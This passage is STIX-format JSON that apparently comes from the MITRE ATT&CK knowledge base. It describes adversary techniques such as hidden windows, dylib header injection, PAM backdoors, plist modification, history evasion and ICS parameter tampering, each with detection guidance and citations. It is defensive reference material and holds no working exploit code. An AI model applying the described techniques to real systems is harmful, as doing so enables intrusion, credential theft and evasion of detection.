"2022-04-25T14:00:00.188Z", "name": "Hidden Window", "description": "Adversaries may implement hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. Adversaries may abuse operating system functionality to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.\n\n### Windows\nThere are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1086), Jscript, and VBScript to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. (Citation: PowerShell About 2019)\n\n### Mac\nThe configurations for how applications run on macOS are listed in property list (plist) files. One of the tags in these files can be\u00a0apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock. However, adversaries can abuse this feature and hide their running window.(Citation: Antiquated Mac Malware)\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Travis Smith, Tripwire"], "x_mitre_detection": "Monitor processes and command-line arguments for actions indicative of hidden windows. In Windows, enable and configure event logging and PowerShell logging to check for the hidden window style. In MacOS, plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the apple.awt.UIElement or any other suspicious plist tag in plist files and flag them.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--04ee0cb7-dac3-4c6c-9387-4c6aa096f4cf", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1143", "external_id": "T1143"}, {"source_name": "PowerShell About 2019", "description": "Wheeler, S. et al.. (2019, May 1). About PowerShell.exe. Retrieved October 11, 2019.", "url": "https://docs.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Core/About/about_PowerShell_exe?view=powershell-5.1"}, {"source_name": "Antiquated Mac Malware", "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.", "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "LC_LOAD_DYLIB Addition", "description": "Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long adjustments are made to the rest of the fields and dependencies (Citation: Writing Bad Malware for OSX). There are tools available to perform these changes. Any changes will invalidate digital signatures on binaries because the binary is being modified. Adversaries can remediate this issue by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn\u2019t checked at load time (Citation: Malware Persistence on OS X).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--04ef4356-8926-45e2-9441-634b6f3dcecb", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1161", "external_id": "T1161"}, {"source_name": "Writing Bad Malware for OSX", "description": "Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017.", "url": "https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf"}, {"source_name": "Malware Persistence on OS X", "description": "Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017.", "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-03-03T00:31:33.071Z", "name": "Standard Encoding", "description": "Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", "created": "2020-03-14T23:36:52.095Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1132/001", "external_id": "T1132.001"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}, {"source_name": "Wikipedia Binary-to-text Encoding", "description": "Wikipedia. (2016, December 26). Binary-to-text encoding. Retrieved March 1, 2017.", "url": "https://en.wikipedia.org/wiki/Binary-to-text_encoding"}, {"source_name": "Wikipedia Character Encoding", "description": "Wikipedia. (2017, February 19). Character Encoding. Retrieved March 1, 2017.", "url": "https://en.wikipedia.org/wiki/Character_encoding"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-09-29T21:14:57.263Z", "name": "Embedded Payloads", "description": "Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553) by not impacting execution controls such as digital signatures and notarization tickets.(Citation: Sentinel Labs) \n\nAdversaries may embed payloads in various file formats to hide payloads.(Citation: Microsoft Learn) This is similar to [Steganography](https://attack.mitre.org/techniques/T1027/003), though does not involve weaving malicious content into specific bytes and patterns related to legitimate digital media formats.(Citation: GitHub PSImage) \n\nFor example, adversaries have been observed embedding payloads within or as an overlay of an otherwise benign binary.(Citation: Securelist Dtrack2) Adversaries have also been observed nesting payloads (such as executables and run-only scripts) inside a file of the same format.(Citation: SentinelLabs reversing run-only applescripts 2021) \n\nEmbedded content may also be used as [Process Injection](https://attack.mitre.org/techniques/T1055) payloads used to infect benign system processes.(Citation: Trend Micro) These embedded then injected payloads may be used as part of the modules of malware designed to provide specific features such as encrypting C2 communications in support of an orchestrator module. For example, an embedded module may be injected into default browsers, allowing adversaries to then communicate via the network.(Citation: Malware Analysis Report ComRAT)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Nick Cairns, @grotezinfosec"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS", "Windows", "Linux"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_system_requirements": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1", "created": "2022-09-30T18:50:14.351Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1027/009", "external_id": "T1027.009"}, {"source_name": "GitHub PSImage", "description": "Barrett Adams . (n.d.). Invoke-PSImage . Retrieved September 30, 2022.", "url": "https://github.com/peewpw/Invoke-PSImage"}, {"source_name": "Malware Analysis Report ComRAT", "description": "CISA. (2020, October 29). Malware Analysis Report (AR20-303A) MAR-10310246-2.v1 \u2013 PowerShell Script: ComRAT. Retrieved September 30, 2022.", "url": "https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a"}, {"source_name": "Trend Micro", "description": "Karen Victor. (2020, May 18). Reflective Loading Runs Netwalker Fileless Ransomware. Retrieved September 30, 2022.", "url": "https://www.trendmicro.com/en_us/research/20/e/netwalker-fileless-ransomware-injected-via-reflective-loading.html"}, {"source_name": "Securelist Dtrack2", "description": "KONSTANTIN ZYKOV. (2019, September 23). Hello! My name is Dtrack. Retrieved September 30, 2022.", "url": "https://securelist.com/my-name-is-dtrack/93338/"}, {"source_name": "Microsoft Learn", "description": "Microsoft. (2021, April 6). 2.5 ExtraData. Retrieved September 30, 2022.", "url": "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/c41e062d-f764-4f13-bd4f-ea812ab9a4d1"}, {"source_name": "SentinelLabs reversing run-only applescripts 2021", "description": "Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 29, 2022.", "url": "https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/"}, {"source_name": "Sentinel Labs", "description": "Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 30, 2022.", "url": "https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:56:58.586Z", "name": "Service Stop", "description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment. (Citation: Enterprise ATT&CK) Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct Data Destruction. (Citation: Enterprise ATT&CK)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "inhibit-response-function"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["File: File Modification", "Command: Command Execution", "Process: OS API Execution", "Process: Process Termination", "Service: Service Metadata", "Windows Registry: Windows Registry Key Modification", "Process: Process Creation"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0881", "external_id": "T0881"}, {"source_name": "Enterprise ATT&CK", "description": "Enterprise ATT&CK Enterprise ATT&CK Service Stop Retrieved. 2019/10/29 Service Stop Retrieved. 2019/10/29 ", "url": "https://attack.mitre.org/techniques/T1489/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Plist Modification", "description": "Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as /Library/Preferences (which execute with elevated privileges) and ~/Library/Preferences (which execute with a user's privileges). \nAdversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanism. (Citation: Sofacy Komplex Trojan)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like \"Knock Knock\" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed.\n\nMonitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["Application whitelisting", "Process whitelisting", "Whitelisting by file name or path"], "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--06780952-177c-4247-b978-79c357fb311f", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1150", "external_id": "T1150"}, {"source_name": "Sofacy Komplex Trojan", "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.", "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Pluggable Authentication Modules", "description": "Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)\n\nAdversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)\n\nMalicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Scott Knight, @sdotknight, VMware Carbon Black", "George Allen, VMware Carbon Black"], "x_mitre_detection": "Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nLook for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["root"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771", "created": "2020-06-26T04:01:09.648Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1556/003", "external_id": "T1556.003"}, {"source_name": "Apple PAM", "description": "Apple. (2011, May 11). PAM - Pluggable Authentication Modules. Retrieved June 25, 2020.", "url": "https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt"}, {"source_name": "Man Pam_Unix", "description": "die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June 25, 2020.", "url": "https://linux.die.net/man/8/pam_unix"}, {"source_name": "Red Hat PAM", "description": "Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES (PAM). Retrieved June 25, 2020.", "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules"}, {"source_name": "PAM Backdoor", "description": "zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June 25, 2020.", "url": "https://github.com/zephrax/linux-pam-backdoor"}, {"source_name": "PAM Creds", "description": "Fern\u00e1ndez, J. M. (2018, June 27). Exfiltrating credentials via PAM backdoors & DNS requests. Retrieved June 26, 2020.", "url": "https://x-c3ll.github.io/posts/PAM-backdoor-DNS/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Revert Cloud Instance", "description": "An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.\n\nAnother variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Netskope"], "x_mitre_detection": "Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to snapshots and rollbacks and VM configuration changes, that are occurring outside of normal activity. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["IaaS"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1", "created": "2020-06-16T18:42:20.734Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1578/004", "external_id": "T1578.004"}, {"source_name": "Tech Republic - Restore AWS Snapshots", "description": "Hardiman, N.. (2012, March 20). Backing up and restoring snapshots on Amazon EC2 machines. Retrieved October 8, 2019.", "url": "https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/"}, {"source_name": "Google - Restore Cloud Snapshot", "description": "Google. (2019, October 7). Restoring and deleting persistent disk snapshots. Retrieved October 8, 2019.", "url": "https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "HISTCONTROL", "description": "The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that \u201c ls\u201d will not be saved, but \u201cls\u201d would be saved by history. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Correlating a user session with a distinct lack of new commands in their .bash_history can be a clue to suspicious behavior. Additionally, users checking or changing their HISTCONTROL environment variable is also suspicious.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS"], "x_mitre_version": "1.1", "x_mitre_defense_bypassed": ["Log analysis", "Host forensic analysis"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--086952c4-5b90-4185-b573-02bad8e11953", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1148", "external_id": "T1148"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/13.html", "external_id": "CAPEC-13"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Gather Victim Host Information", "description": "Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f", "created": "2020-10-02T16:39:33.966Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1592", "external_id": "T1592"}, {"source_name": "ATT ScanBox", "description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.", "url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks"}, {"source_name": "ThreatConnect Infrastructure Dec 2020", "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", "url": "https://threatconnect.com/blog/infrastructure-research-hunting/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-13T17:56:58.786Z", "name": "Modify Parameter", "description": "Adversaries may modify parameters used to instruct industrial control system devices. These devices operate via programs that dictate how and when to perform actions based on such parameters. Such parameters can determine the extent to which an action is performed and may specify additional options. For example, a program on a control system device dictating motor processes may take a parameter defining the total number of seconds to run that motor. \n\nAn adversary can potentially modify these parameters to produce an outcome outside of what was intended by the operators. By modifying system and process critical parameters, the adversary may cause [Impact](https://attack.mitre.org/tactics/TA0105) to equipment and/or control processes. Modified parameters may be turned into dangerous, out-of-bounds, or unexpected values from typical operations. For example, specifying that a process run for more or less time than it should, or dictating an unusually high, low, or invalid value as a parameter.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "impair-process-control"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.3", "x_mitre_data_sources": ["Application Log: Application Log Content", "Operational Databases: Device Alarm", "Network Traffic: Network Traffic Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0836", "external_id": "T0836"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Digital Certificates", "description": "Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.\n\nAdversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0979abf9-4e26-43ec-9b6e-54efc4e70fca", "created": "2020-10-02T16:58:58.738Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1596/003", "external_id": "T1596.003"}, {"source_name": "SSLShopper Lookup", "description": "SSL Shopper. (n.d.). SSL Checker. Retrieved October 20, 2020.", "url": "https://www.sslshopper.com/ssl-checker.html"}, {"source_name": "Medium SSL Cert", "description": "Jain, M. (2019, September 16). Export & Download \u2014 SSL Certificate from Server (Site URL). Retrieved October 20, 2020.", "url": "https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2"}], "object_marking_refs": 